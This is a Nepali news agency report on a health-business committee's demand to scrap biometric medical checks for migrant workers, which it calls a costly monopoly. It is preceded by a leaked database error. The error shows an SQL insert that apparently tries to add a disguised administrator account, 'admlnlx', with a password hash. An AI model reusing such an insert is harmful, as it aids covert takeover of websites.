WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.0JdruXf37s2TsLAVj1WThsvDkQVm.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:01:21', '', 'admlnlx', 'admlnlx')
काठमाडौँ,फागुन ३ –
वैदेशिक रोजगार स्वास्थ्य व्यवसायी सङ्घर्ष समितिले बायोमेट्रिक प्राणालीका नाममा सर्वसाधारणमाथि ठगी भइरहेकाले त्यस्तो स्वास्थ्य परीक्षण प्रक्रिया खारेज गर्न माग गरेको छ ।
यहाँ आज आयोजित पत्रकार सम्मेलनमा समितिले एक साताभित्र गाम्का नेपाल र बायोमेट्रिकले गरिरहेको स्वास्थ्य परीक्षण खारेज गर्न आग्रह गरेको हो ।
समितिका संयोजक सीताराम रेग्मीले आधुनिक प्रविधिको नाममा बायोमेट्रिक प्रणालीमा गाम्का नेपाल नामक संस्थाको एकाधिकार कायम गरी कामदारलाई रु दुई हजार ९०० मा हुँदै आएको स्वास्थ्य परीक्षण अहिले १४ हजार लिने गरेकाले सो कार्यलाई रोक्न सरकारसँग माग गर्नुभयो ।
साई पोलिक्लिनिकका सञ्चालक एवम् व्यवसायी कला दाहालले बायोमेट्रिक प्रणाली स्वास्थ्यसँग सम्बन्धित नरहेकाले त्यसको विकल्प खोजी त्यस क्षेत्रमा भइरहेको ठगी अविलम्ब रोक्नुपर्नेमा जोड दिनुभयो ।
उहाँले वैदेशिक रोजगारको विषयमा सरकारले फ्रि–भिसा र फ्रि–टिकटको अवधारणा ल्याएपनि व्यवसायीले रु एक लाखदेखि रु चार लाखसम्म लुटिरहेको जानकारी दिनुभयो ।
नेपाल मेडिकल महासङ्घका महासचिव जीवन बयलकोटीले गाम्का नेपालले सरकारको आँखामा छारो हालेर सोझा कामदारलाई ठगी गरिरहँदा पनि श्रम मन्त्रालयले केही गर्न नसकेकाले त्यस्तो भ्रष्टाचार रोक्न सरकारले छानबिन गरी दोषीलाई कारबाही गर्नुपर्ने बताउनुभयो । – रासस